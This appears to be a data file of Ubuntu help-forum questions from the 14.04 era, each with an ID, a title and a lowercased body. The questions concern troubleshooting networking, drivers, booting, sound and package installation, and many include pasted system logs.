463702	ubuntu new version	so , i have managed to use ubuntu for 6 months or so , and i have completely ignored the zorin distro . using a youtube video i managed to install ubuntu server 12.04 and i have been very happy with everything . i noticed that ubuntu 14 is out and i am downloading it , but ubutu server 14 is only available in 64 bit . so my question is if i install ubuntu 14.04 desktop will ubuntu 12.04 server still work fine ? i am imagining that this is a silly question but i would like to check before i do anything too erratic .
463707	qbittorrent only after reboot	i 'm having a problem with qbittorrent . if the server is left running for a while ( day or so ) , qbittorrent can not connect to peers until i reboot . when the server comes back up , everything works perfectly again for a while until everything is done downloading . only then once it stops for a while will it not connect to peers for added torrents ( all trackers status `` not working '' ) . any ideas as to what may be causing this ? configuration : ubuntu server 14.04 qbittorrent v3.1.9.2 ( qbittorrent-nox using web ui ) qbittorrent configured to route through socks5 proxy ports forwarded through router
463723	does 14.04 use xorg.conf or ~/.config/monitors.xml ?	if i have both files /etc/x11/xorg.conf and ~/.config/monitors.xml , which one will take precedence ? ?
463724	recover windows after reinstalling ubuntu	i have a dual boot machine with windows 8.1 and ubuntu . yesterday i tried to reinstall ubuntu to use a lot of the free space i had in my hard drive . i was n't very smart and i simply formated my old ubuntu and grub partitions ( which only had something like 15 gb ) and joined all the free space into a 350 gb partition . i created a usb drive with the recovery image for my windows 8.1 and proceeded to try to reinstall ubuntu . that 's when everything went down the drain . before reinstalling ubuntu , i 've tried running the windows 8.1 recovery tools . when i tried to refresh my system , it required me to insert the recovery media , which i did n't understand , as i was already running it from my recovery media . i got desperate and copied all the files from the recovery usb drive into another machine and created a new ubuntu live usb . i reinstalled ubuntu into my free space , but now windows is not recognized anymore . grub shows up , but there 's no windows option . there is some windows recovery option , but all it does is go back to grub . ubuntu finds the windows partition , and i can actually access all my files from it . but i can not boot windows from that partition . i still have a recovery tools partition that came with my laptop too , but i 'm not being able to boot it or run it . i know i did lots of stupid i stuff . i did n't backup my windows partition , i have overwritten my recovery usb drive with my ubuntu image . but now the deed is done . i will be more careful . but , as i can access all my windows files from ubuntu , i think there 's still some hope to recover windows . thanks in advance .
463726	is ubuntu desktop for android phone avalable for installation ?	any links to this or correct version of ubuntu for android , and where to download ?
463728	how wine ( windows programme loader ) works on ubuntu ?	i know that we can run windows ( .exe ) programmes with help of wine . i want to know that how wine works and runs exe programmes on ubuntu . as there is two different operating system windows ( closed source ) and ubuntu ( linux open-source ) and different method of working because ubuntu based on package management ( apt , dpkg ) . then why wine is important and what means by `` wine is not an emulator '' ? as i know it creates $ hone/.wine/drive_c/windows etc . directories then is it works similarly that on windows and uses same files in windows/system32 as real window platform ? i want to know working and importance of it , because why it is projected ( what is need/why it should allow to ) to run windows programmes on ubuntu ? however it is not fully supports several software of windows and graphics . and what is parallel packages like cross-over , play on linux ?
463729	configure nested openvpn servers	my company now work with openvpn , we have an openvpn server and clients connect to this server without any problem . recently , we want to test nested openvpn servers , the scenario that we want : client connect to first openvpn server , openvpn server connect to other openvpn server , second openvpn connect to internet . client > > openvpn server 1 > > openvpn server 2 > > internet i 'm trying to complete this but i ca n't . can any one help me .. what is the options on configuration files on openvpn server one and two ? thank you .
463734	upgrade to 14.04 added lightdm to server edition	the update from 13.10 to 14.04 using do-release-upgrade seems to have added lightdm to my computer . on top of that , lightdm wasnât even set up properly , nor do i want it set up . i prefer not to use graphical login , and to start with server edition and install only things i want on my desktop , just out of preference . i got to a console and tried apt-get removing lightdm , which made gdm install . attempting to remove gdm tries to make kdm install and nvidia-prime remove . how do i get things back to the way they were before ? iâve upgraded three times before this without problem .
463735	ubuntu 14.04 gedit error	when i use gedit from the command line in ubuntu 14.04 , after saving a file and exiting gedit i get this : ( gedit:6048 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files is this a problem , or something that requires correction ? and if so , how do i fix this ? thanks , paul .
463736	takes a long time to boot	i am using ubuntu 12.04.3 lts . since a couple of days , i have noticed that on reboot my machine takes ages to get started . during this boot process , i am not allowed to log in to the shell ( ctrl + alt + f1/f2 ... . ) and i have no access to the machine until the end of the boot process . this is the appropriate part of the dmesg that i find after the boot : [ 69.524516 ] wlan0 : rx assocresp from 5c : ac:4c:52:90:3e ( capab=0x411 status=0 aid=1 ) [ 69.524519 ] wlan0 : associated [ 69.534843 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 79.988437 ] wlan0 : no ipv6 routers present [ 174.866967 ] init : anacron main process ( 1288 ) killed by term signal [ 175.287079 ] ip_tables : ( c ) 2000-2006 netfilter core team [ 175.294914 ] ip6_tables : ( c ) 2000-2006 netfilter core team [ 176.205854 ] e1000e 0000:00:19.0 : pme # enabled [ 1140.409952 ] [ drm ] initialized drm 1.1.0 20060810 [ 1140.418478 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 1140.418482 ] nouveau 0000:01:00.0 : power state changed by acpi to d0 [ 1140.418490 ] nouveau 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1140.418494 ] nouveau 0000:01:00.0 : setting latency timer to 64 [ 1140.419906 ] [ drm ] nouveau 0000:01:00.0 : detected an nvd0 generation card ( 0x0d9160a1 ) [ 1140.419911 ] checking generic ( e1000000 130000 ) vs hw ( d0000000 10000000 ) [ 1140.419912 ] checking generic ( e1000000 130000 ) vs hw ( e0000000 2000000 ) [ 1140.419914 ] fb : conflicting fb hw usage nouveaufb vs vesa vga - removing generic driver i see that something related to drm is taking a lot of time . could someone suggest how to resolve this or disable it completely ? thanks .
463737	wifi is ok , but wired network does not work	this is old problem since ubuntu 13.04 on my thinkpad x200 laptop . i first installed win 8.1 ( or win 7 when using ubuntu 13.04 ) , both wired connection and wireless connection works fine . after installed ubuntu 14.04 , wifi connection on both ubuntu and win8.1 works fine , but wired ethernet connection has no any reply , even does not show on win 8.1 control pannel ... on win 8.1 network control center , there is only wifi connection , no wired ethernet connection at all . wired connection driver shows error on device manager . delete the divece and reinstall or check the driver does not solve the problem . on ubuntu 14.04 , wifi works fine , but ethernet connection does not work . there is even no any sigh when plug the internet wire . one thing i can confirm is that all intert connection was ok just after newly installed window 7 or 8.1. not sure is it the problem of ubuntu or some driver from lenovo . ... ... belowing is some code showing on ubuntu . ethernet module is intel 82567lm gigabit network conneciton waiting for your helps . thanks . ================= kwangil @ kwangil-thinkpad-x200-1404 : ~ $ nm-tool networkmanager tool state : connected ( global ) device : wlan0 [ hieu ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 00:21:5d:77:44:3c capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *hieu : infra , 00:08:9f:31 : eb:3c , freq 2432 mhz , rate 54 mb/s , strength 95 wpa wpa2 ipv4 settings : address : 192.168.0.16 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 143.248.1.177 dns : 143.248.2.177 device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : 00:1f:16:0e:16:24 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off kwangil @ kwangil-thinkpad-x200-1404 : ~ $ dmesg | grep -e eth0 -e e100 [ 0.000000 ] brk [ 0x01fe1000 , 0x01fe1fff ] pgtable [ 1.389323 ] e1000e : intel ( r ) pro/1000 network driver - 2.3.2-k [ 1.389326 ] e1000e : copyright ( c ) 1999 - 2013 intel corporation . [ 1.389671 ] e1000e 0000:00:19.0 : interrupt throttling rate ( ints/sec ) set to dynamic conservative mode [ 1.389699 ] e1000e 0000:00:19.0 : irq 43 for msi/msi-x [ 1.596122 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) 00:1f:16:0e:16:24 [ 1.596125 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 1.596154 ] e1000e 0000:00:19.0 eth0 : mac : 7 , phy : 8 , pba no : 1008ff-0ff [ 13.700913 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 21.428546 ] e1000e 0000:00:19.0 : irq 43 for msi/msi-x [ 21.532107 ] e1000e 0000:00:19.0 : irq 43 for msi/msi-x [ 21.532244 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 21.532638 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 1653.820539 ] e1000e : eth0 nic link is up 100 mbps half duplex , flow control : none [ 1653.820660 ] e1000e 0000:00:19.0 eth0 : link speed was downgraded by smartspeed [ 1653.820722 ] e1000e 0000:00:19.0 eth0 : 10/100 speed : disabling tso [ 1653.820785 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 1678.832081 ] netdev watchdog : eth0 ( e1000e ) : transmit queue 0 timed out [ 1678.832083 ] modules linked in : ctr ccm rfcomm bnep btusb bluetooth snd_hda_codec_conexant joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm arc4 iwldvm mac80211 snd_page_alloc thinkpad_acpi nvram snd_seq_midi snd_seq_midi_event snd_rawmidi coretemp kvm_intel snd_seq kvm snd_seq_device snd_timer psmouse serio_raw snd lpc_ich iwlwifi cfg80211 wmi soundcore mei_me i915 parport_pc mei video drm_kms_helper drm ppdev mac_hid i2c_algo_bit lp parport hid_generic usbhid hid ahci libahci e1000e ptp pps_core [ 1678.832301 ] e1000e 0000:00:19.0 eth0 : reset adapter unexpectedly [ 1679.209234 ] e1000e 0000:00:19.0 eth0 : hardware error [ 1683.202559 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready kwangil @ kwangil-thinkpad-x200-1404 : ~ $ modinfo e1000e filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko version : 2.3.2-k license : gpl description : intel ( r ) pro/1000 network driver author : intel corporation , srcversion : fafc167239309c03f11f440 alias : pci : v00008086d000015a3sv*sd*bc*sc*i* alias : pci : v00008086d000015a2sv*sd*bc*sc*i* alias : pci : v00008086d000015a1sv*sd*bc*sc*i* alias : pci : v00008086d000015a0sv*sd*bc*sc*i* alias : pci : v00008086d00001559sv*sd*bc*sc*i* alias : pci : v00008086d0000155asv*sd*bc*sc*i* alias : pci : v00008086d0000153bsv*sd*bc*sc*i* alias : pci : v00008086d0000153asv*sd*bc*sc*i* alias : pci : v00008086d00001503sv*sd*bc*sc*i* alias : pci : v00008086d00001502sv*sd*bc*sc*i* alias : pci : v00008086d000010f0sv*sd*bc*sc*i* alias : pci : v00008086d000010efsv*sd*bc*sc*i* alias : pci : v00008086d000010ebsv*sd*bc*sc*i* alias : pci : v00008086d000010easv*sd*bc*sc*i* alias : pci : v00008086d00001525sv*sd*bc*sc*i* alias : pci : v00008086d000010dfsv*sd*bc*sc*i* alias : pci : v00008086d000010desv*sd*bc*sc*i* alias : pci : v00008086d000010cesv*sd*bc*sc*i* alias : pci : v00008086d000010cdsv*sd*bc*sc*i* alias : pci : v00008086d000010ccsv*sd*bc*sc*i* alias : pci : v00008086d000010cbsv*sd*bc*sc*i* alias : pci : v00008086d000010f5sv*sd*bc*sc*i* alias : pci : v00008086d000010bfsv*sd*bc*sc*i* alias : pci : v00008086d000010e5sv*sd*bc*sc*i* alias : pci : v00008086d0000294csv*sd*bc*sc*i* alias : pci : v00008086d000010bdsv*sd*bc*sc*i* alias : pci : v00008086d000010c3sv*sd*bc*sc*i* alias : pci : v00008086d000010c2sv*sd*bc*sc*i* alias : pci : v00008086d000010c0sv*sd*bc*sc*i* alias : pci : v00008086d00001501sv*sd*bc*sc*i* alias : pci : v00008086d00001049sv*sd*bc*sc*i* alias : pci : v00008086d0000104dsv*sd*bc*sc*i* alias : pci : v00008086d0000104bsv*sd*bc*sc*i* alias : pci : v00008086d0000104asv*sd*bc*sc*i* alias : pci : v00008086d000010c4sv*sd*bc*sc*i* alias : pci : v00008086d000010c5sv*sd*bc*sc*i* alias : pci : v00008086d0000104csv*sd*bc*sc*i* alias : pci : v00008086d000010bbsv*sd*bc*sc*i* alias : pci : v00008086d00001098sv*sd*bc*sc*i* alias : pci : v00008086d000010basv*sd*bc*sc*i* alias : pci : v00008086d00001096sv*sd*bc*sc*i* alias : pci : v00008086d0000150csv*sd*bc*sc*i* alias : pci : v00008086d000010f6sv*sd*bc*sc*i* alias : pci : v00008086d000010d3sv*sd*bc*sc*i* alias : pci : v00008086d0000109asv*sd*bc*sc*i* alias : pci : v00008086d0000108csv*sd*bc*sc*i* alias : pci : v00008086d0000108bsv*sd*bc*sc*i* alias : pci : v00008086d0000107fsv*sd*bc*sc*i* alias : pci : v00008086d0000107esv*sd*bc*sc*i* alias : pci : v00008086d0000107dsv*sd*bc*sc*i* alias : pci : v00008086d000010b9sv*sd*bc*sc*i* alias : pci : v00008086d000010d5sv*sd*bc*sc*i* alias : pci : v00008086d000010dasv*sd*bc*sc*i* alias : pci : v00008086d000010d9sv*sd*bc*sc*i* alias : pci : v00008086d00001060sv*sd*bc*sc*i* alias : pci : v00008086d000010a5sv*sd*bc*sc*i* alias : pci : v00008086d000010bcsv*sd*bc*sc*i* alias : pci : v00008086d000010a4sv*sd*bc*sc*i* alias : pci : v00008086d0000105fsv*sd*bc*sc*i* alias : pci : v00008086d0000105esv*sd*bc*sc*i* depends : ptp intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 69 : b00 : a7:9b:859:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 parm : debugebug level ( 0=none , ... ,16=all ) ( int ) parm : copybreak : maximum size of packet that is copied to a new buffer on receive ( uint ) parm : txintdelay : transmit interrupt delay ( array of int ) parm : txabsintdelay : transmit absolute interrupt delay ( array of int ) parm : rxintdelay : receive interrupt delay ( array of int ) parm : rxabsintdelay : receive absolute interrupt delay ( array of int ) parm : interruptthrottlerate : interrupt throttling rate ( array of int ) parm : intmode : interrupt mode ( array of int ) parm : smartpowerdownenable : enable phy smart power down ( array of int ) parm : kumeranlockloss : enable kumeran lock loss workaround ( array of int ) parm : writeprotectnvm : write-protect nvm [ warning : disabling this can lead to corrupted nvm ] ( array of int ) parm : crcstripping : enable crc stripping , disable if your bmc needs the crc ( array of int ) kwangil @ kwangil-thinkpad-x200-1404 : ~ $ lspci -nn | grep 020000:19.0 ethernet controller [ 0200 ] : intel corporation 82567lm gigabit network connection [ 8086:10f5 ] ( rev 03 ) kwangil @ kwangil-thinkpad-x200-1404 : ~ $ cat /sys/devices/pci0000:00/0000:00:19.0/power/control on
463738	pixel qi screen on ubuntu	i just installed pixel qi screen ( pq101wx01 ) , but i can only control dimming of the screen . it does n't become more readable in the sunlight . and if i go to sleep , screen becomes completely black . how do i shut down backlight in ubuntu ( 13 or more newer ) and switch pixel qi screen mode of operation to readable in the sun ? here 's the quote from clover 's sunbook having pixelqi display : `` in daylight , the backlight can be turned off completely , cutting the power consumption , extending battery life , and reducing eyestrain . reflective mode provides 1024 x 600 resolution in black & white . '' this is the feature i am searching for . edit : thank you for the answers and help . after talking to the pixel qi company , it seams like the screen i got was a fake one , so be careful when ordering off ebay .
463739	lubuntu 14.04 shutdown - firefox not exiting properly at logout/shutdown	having a little past experience with linux i recently decided to install lubuntu 14.04 lts to try and get away from windows and got most everything working except one thing so far ... i have set firefox to `` show my windows and tabs from last time '' and that works just fine as long as i remember to close firefox before i shutdown or restart , but if i forget , the next time i start firefox 9/10 times it says that firefox was not closed properly and sometimes forgets my tabs i had open . i thought to try and find the logout script for lxde ( if there is one ) so i can maybe add a command such as `` sleep 1 '' to delay logout for a second to allow firefox to close properly , in my google searches the only solution i could find that was close was firefox not closed properly when logging out and i tried the solution suggested in that and could n't get it to work and figured the reason why was because the solution was for gnome as opposed to lxde so my question is , how can i add a delay during logout/shutdown to allow firefox ( or any other programs ) to exit properly before continuing with logout/shutdown ? if there is already a solution to this issue , i apologize for not searching hard enough .
463742	processing triggers for menu gives syntax error for specific apps	after upgrading to 14.04 ( coming from 12.04 ) a have a few error messages if i do a sudo apt-get install *whatever* ... ... processing triggers for menu ( 2.1.46ubuntu1 ) ... /usr/share/menu/ucx : line 1 : syntax error near unexpected token `ucx' /usr/share/menu/ucx : line 1 : ` ? package ( ucx ) : needs= '' x11 '' section= '' applications/programming '' \' /usr/share/menu/aliengui : line 1 : syntax error near unexpected token `controlaula' /usr/share/menu/aliengui : line 1 : ` ? package ( controlaula ) : needs= '' x11 '' section= '' apps/archiving '' \' /usr/share/menu/jamin : line 1 : syntax error near unexpected token `jamin' /usr/share/menu/jamin : line 1 : ` ? package ( jamin ) : needs= '' x11 '' section= '' applications/sound '' \' /usr/share/menu/gnu-smalltalk : line 1 : syntax error near unexpected token `gnu-smalltalk' /usr/share/menu/gnu-smalltalk : line 1 : ` ? package ( gnu-smalltalk ) : needs= '' text '' section= '' applications/programming '' \' /usr/share/menu/patchage : line 1 : syntax error near unexpected token `patchage' /usr/share/menu/patchage : line 1 : ` ? package ( patchage ) : needs= '' x11 '' section= '' applications/sound '' \' /usr/share/menu/jackeq : line 1 : syntax error near unexpected token `jackeq' /usr/share/menu/jackeq : line 1 : ` ? package ( jackeq ) : needs= '' x11 '' \' /usr/share/menu/dvdrip-queue : line 1 : syntax error near unexpected token `dvdrip- queue' /usr/share/menu/dvdrip-queue : line 1 : ` ? package ( dvdrip-queue ) : \' /usr/share/menu/kicad : line 1 : syntax error near unexpected token `kicad' /usr/share/menu/kicad : line 1 : ` ? package ( kicad ) : needs= '' x11 '' section= '' applications/science/electronics '' \' /usr/share/menu/pypar2 : line 1 : syntax error near unexpected token `pypar2' /usr/share/menu/pypar2 : line 1 : ` ? package ( pypar2 ) : needs= '' x11 '' \' /usr/share/menu/pppoeconf : line 1 : syntax error near unexpected token `pppoeconf' /usr/share/menu/pppoeconf : line 1 : ` ? package ( pppoeconf ) : needs= '' text '' section= '' applications/system/administration '' hints= '' network '' title= '' dsl/pppoe configuration tool '' command= '' /usr/sbin/pppoeconf '' icon= '' /usr/share/pixmaps /pppoeconf.xpm '' ' /usr/share/menu/qelectrotech : line 1 : syntax error near unexpected token `qelectrotech' /usr/share/menu/qelectrotech : line 1 : ` ? package ( qelectrotech ) : \' /usr/share/menu/paman : line 1 : syntax error near unexpected token `paman' /usr/share/menu/paman : line 1 : ` ? package ( paman ) : needs= '' x11 '' section= '' applications/sound '' \' /usr/share/menu/ardour3 : line 1 : syntax error near unexpected token `ardour3' /usr/share/menu/ardour3 : line 1 : ` ? package ( ardour3 ) : needs= '' x11 '' section= '' applications/sound '' \' /usr/share/menu/hydrogen-git : line 1 : syntax error near unexpected token `hydrogen' /usr/share/menu/hydrogen-git : line 1 : ` ? package ( hydrogen ) : command= '' /usr /bin/hydrogen '' \' /usr/share/menu/uex : line 1 : syntax error near unexpected token `uex' /usr/share/menu/uex : line 1 : ` ? package ( uex ) : needs= '' x11 '' section= '' applications/programming '' \' /usr/share/menu/ucx.menu : line 1 : syntax error near unexpected token `ucx' /usr/share/menu/ucx.menu : line 1 : ` ? package ( ucx ) : needs= '' x11 '' section= '' applications/programming '' \' /usr/share/menu/libjackasyn0 : line 1 : syntax error near unexpected token `sweep' /usr/share/menu/libjackasyn0 : line 1 : ` ? package ( sweep ) : \' /usr/share/menu/teamspeak-client : line 1 : syntax error near unexpected token `teamspeak-client' /usr/share/menu/teamspeak-client : line 1 : ` ? package ( teamspeak-client ) : needs= '' x11 '' \' this are applications which i installed on 12.04 and they are all working .
463744	kodak hero 5.1 scanner permissions on ubuntu 12.04	i have a hero 5.1 aio printer/scanner and use ubuntu 12.04 lts . printer works fine but i can only use scanner in sudo mode . i have added my username by sudo adduser les scanner but still no luck . sudo scanimage -l outputs : - device `kodakaio : libusb:001:005 ' is a kodak kodak hero 5.1 aio flatbed scanner scanimage -l outputs : - no scanners were identified . can someone suggest a workaround please ? it will need to be simply explained . i am new to linux having just moved from windows xp . thanks les
463746	error in installation of npm	i have installed npm using the following command apt-get install npm using repo apt-add-repository ppa : chris-lea/node.js when i pass the command it gives error apt-get install npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : npm : depends : nodejs but it is not going to be installed depends : nodejs-dev depends : node-request but it is not going to be installed depends : node-mkdirp but it is not going to be installed depends : node-minimatch but it is not going to be installed depends : node-semver but it is not going to be installed depends : node-ini but it is not going to be installed depends : node-graceful-fs but it is not going to be installed depends : node-abbrev but it is not going to be installed depends : node-nopt but it is not going to be installed depends : node-fstream but it is not going to be installed depends : node-rimraf but it is not going to be installed depends : node-tar but it is not going to be installed depends : node-which but it is not going to be installed when i run node -v it gives 1.4.9 all the programs of also works , can anyone tell me what this error
463747	xpad notes remain pasted at the time of startup	how can i add the xpad in my startup programs so that they remain pasted on my desktop ( ubuntu 13.10 ) always ? however xpad is working fine but it does n't start at the booting of the machine and i want xpad to automatically load and notes be pasted on the desktop always .
463748	no sound through speakers on compaq pressario v2414nr	i have upgraded to ubuntu 14.04 lts from 12.04 lts on a ~8.5-year old compaq pressario v2414 laptop . this machine did not have any problems with audio playback under 12.04 . as installed , the ubuntu 14.04 is silent on the speakers but plays okay through headphones . in the sound settings window , output tab , the `` play sound through '' box lists only headphones even when one is not connected to the jack . there is no corresponding internal speakers device listed . mute is off and volume control works all the way up for headphones . it seems as if the laptop speakers are not detected . based on other advise on this website hardware info is as below : divakar @ alpha : ~ $ uname -r 3.13.0-24-generic divakar @ alpha : ~ $ lspci | grep audio 00:14.5 multimedia audio controller : advanced micro devices , inc. [ amd/ati ] ixp sb400 ac'97 audio controller ( rev 02 ) divakar @ alpha : ~ $ dmesg | egrep -i ' ( alsa|sound|snd ) ' divakar @ alpha : ~ $ pacmd dump-volumes welcome to pulseaudio ! use `` help '' for usage information . sink 0 : reference = 0 : 50 % 1 : 50 % , real = 0 : 50 % 1 : 50 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 50 % 1 : 50 % , save = yes source 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no source 1 : reference = 0 : 137 % 1 : 137 % , real = 0 : 137 % 1 : 137 % , soft = 0 : 137 % 1 : 137 % , current_hw = 0 : 100 % 1 : 100 % , save = yes divakar @ alpha : ~ $ sudo lshw -c multimedia *-multimedia description : multimedia audio controller product : ixp sb400 ac'97 audio controller vendor : advanced micro devices , inc. [ amd/ati ] physical id : 14.5 bus info : pci @ 0000:00:14.5 version : 02 width : 32 bits clock : 66mhz capabilities : msi bus_master cap_list configuration : driver=snd_atiixp latency=64 mingnt=2 resources : irq:17 memory : c0003400-c00034ff what can i do to get the speakers working ?
463750	unable to access network on ubuntu installed via wubi	i 've installed ubuntu via wubi for windows ( xp ) . however i 'm unable to access internet via ubuntu whereas it works perfectly inwindows xp . also i 'm unable to access the grub menu when i press shift after selecting ubuntu .
463751	make two seperate screens/displays with monitors	my gpu has two dviouts so i have two monitors , but it 's being treated as one logical screen i.e . one display :0 and i can drag windows from one monitor to another . how can i run them like two separate displays/screens so the windows would n't cross from display :0.0 to :0.1 in ubuntu 14.04 ? $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] $ sudo lshw -c video *-display description : vga compatible controller product : rv630 xt [ radeon hd 2600 xt ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:46 memory : d0000000-dfffffff memory : fe7e0000-fe7effff ioport : b000 ( size=256 ) memory : fe7c0000-fe7dffff
463754	ca n't download ttf-mscorefonts-installer on ubuntu 14.04	i have resently installed ubuntu 14.04 if i install the mscorefonts from the ubuntu software center , it gives a positive response , but after this i get a download error . is there any way to resolve this ?
463755	xubuntu 14.04 resume form hibernation/suspend error	every time the system comes out of hibernation/suspend , i get the following error : [ 107691.012100 ] dpm_run_callback ( ) : pmp_bus_resume+0x0/0xa0 returns -19 [ 107691.012101 ] pm : device 00:07 failed to thaw : error -19 the error remains on the screen for about 15-20 seconds , then it goes away , and the system continues to boot normal . system was updated about 1/2 hour prior to posting this question . uname -r shows 3.13.0-26-generic system specs : lenovo ideapad y500 laptop cpu/chipset : 3rd generation intel速 core i7-3630qm ( 2.40ghz 1600mhz 6mb ) memory : 16gb pc3-12800 ddr3 sdram 1600 mhz graphics : nvidia geforce gt750m gddr5 2gb contents of : /var/log/pm-suspend.log /var/log/pm-suspend.log.1 /var/log/syslog /var/log/syslog.1 i found out that there is a bug filled here , that has a fix under # 56 . i tried that , and it also did n't work . i do n't know if its related to it a 100 % , since none mentioned the error message i was getting , listed above . i have filled a bug report .
463758	why ubuntu server 14.04 do n't change source mac on vlans ?	before i had ubuntu server 12.04 and next scheme did work right . there is the vlan with changed mac : $ cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0.4 iface eth0.4 inet dhcp hwaddress ether 00 : e0 : f7 : bd : c3 : b7 hw-mac-address 00 : e0 : f7 : bd : c3 : b7 but after install ubuntu server 14.04 something was wrong and mac addresses of packets on the interface eth0.4 are n't replaced . $ ping 77.122.0.1 ... $ sudo tcpdump -e -s0 -nnpi eth0.4 10:23:14.938013 48:5b:39 : f7:6d : b9 > 00:26 : cb:51:21:40 , ethertype ipv4 ( 0x0800 ) , length 98 : 77.122.7.112 > 77.122.0.1 : icmp echo request , id 2247 , seq 5 , length 64 10:23:15.946028 48:5b:39 : f7:6d : b9 > 00:26 : cb:51:21:40 , ethertype ipv4 ( 0x0800 ) , length 98 : 77.122.7.112 > 77.122.0.1 : icmp echo request , id 2247 , seq 6 , length 64 10:23:16.954001 48:5b:39 : f7:6d : b9 > 00:26 : cb:51:21:40 , ethertype ipv4 ( 0x0800 ) , length 98 : 77.122.7.112 > 77.122.0.1 : icmp echo request , id 2247 , seq 7 , length 64 10:23:17.962002 48:5b:39 : f7:6d : b9 > 00:26 : cb:51:21:40 , ethertype ipv4 ( 0x0800 ) , length 98 : 77.122.7.112 > 77.122.0.1 : icmp echo request , id 2247 , seq 8 , length 64 tcdump shows the source mac is 48:5b:39 : f7:6d : b9 , but it should be 00 : e0 : f7 : bd : c3 : b7 . and ifconfig shows that the interface eth0.4 have the right mac , but anyway it is n't applying for outgoing packets . $ ifconfig eth0 link encap : ethernet hwaddr 48:5b:39 : f7:6d : b9 eth0.4 link encap : ethernet hwaddr 00 : e0 : f7 : bd : c3 : b7 inet addr:77.122.7.112 bcast:77.122.31.255 mask:255.255.224.0 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 what changes in ubuntu server 14.04 ?
463761	how to fix gtk theme for nemo 's pathbar breadcrumbs and disk free space barchart	i like a few features of nemo , but there seems to be a theme problem - at least when running under ubuntu gnome 14.04 : as you can see from this screenshot : it 's not possible to see which of the breadcrumbs is selected , and the barchart for available space seems to be colouring both full and free the same colour ! in the screenshot i have the `` global dark theme '' on , but it 's the same problem without this .
463765	how to open an application weblink with a wine program	i have installed a windows program ( a game called the hunter ) using wine on ubuntu 14.04 . the only way to use this game is by going to its website , create the game options and then hitting an application web link on that website that will pass the options and start the local program . this works in windows because the program that the web browser calls to open this kind of link is set by default when installing the game . how do i manage now to get the wine-installed game to do the same under ubuntu ?
463766	mediatek mt7630 not working on ubuntu 14.04 ( need alternatives )	please help : / i have an asus x550c laptop with a mediatek mt7630e wifi card . the wired internet works , but wireless does n't . i have tried all the online solutions and none of them work . since i need this laptop for work i am very close to giving up and going back to windows : / i 've also seen this bug , does n't give me encouragement that it 's been sitting unresolved like this for the last 9 months : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1220146 what i am asking for here : are there any news on this bug or is there anybody that has a similar setup that managed to get wireless working on their laptop ? is there an alternative , like a wifi usb stick or an adapter that can be plugged in into the ethernet port ( and that works with ubuntu ) ? i am willing to try anything as long as it does n't entail having access to routers ( i am imagining a scenario in a hotel where this is not possible ) is there a linux distro that would work with this setup/card ? ( not sure if this is ok to ask here but i am desperate ) a few symptoms : '' rfkill list all '' does n't show anything after i did the first answer from here : how to make a d-link dwa-123 wireless n 150 work on ubuntu 13.10 ( saucy ) i bought this usb stick : http : //www.amazon.com/s/ref=nb_sb_ss_i_0_14 ? url=search-alias % 3delectronics & field-keywords=linux % 20usb % 20wifi % 20adapters & sprefix=linux+usb+wifi % 2celectronics % 2c208 and since it does n't have linux drivers ( hardware b1 ) i downloaded ndiswrapper and tried installing xp drivers through that - didn't work . fn+f2 button does n't work , wifi lamp does n't turn on thanks for your time ! !
463767	ubuntu\winboot\wubildr.mbr file is missing or corrupt	i have a hp amd64 computer and i am experiencing installation errors : do i have to buy another computer to use ubuntu ? my computer does not recognize ubuntu\winboot\wubildr.mbr . can i download the file and install ubuntu ? do i have to purchase a full installation cd/dvd of windows propack to be able to utilize ubuntu\winboot\wubildr.mbr ?
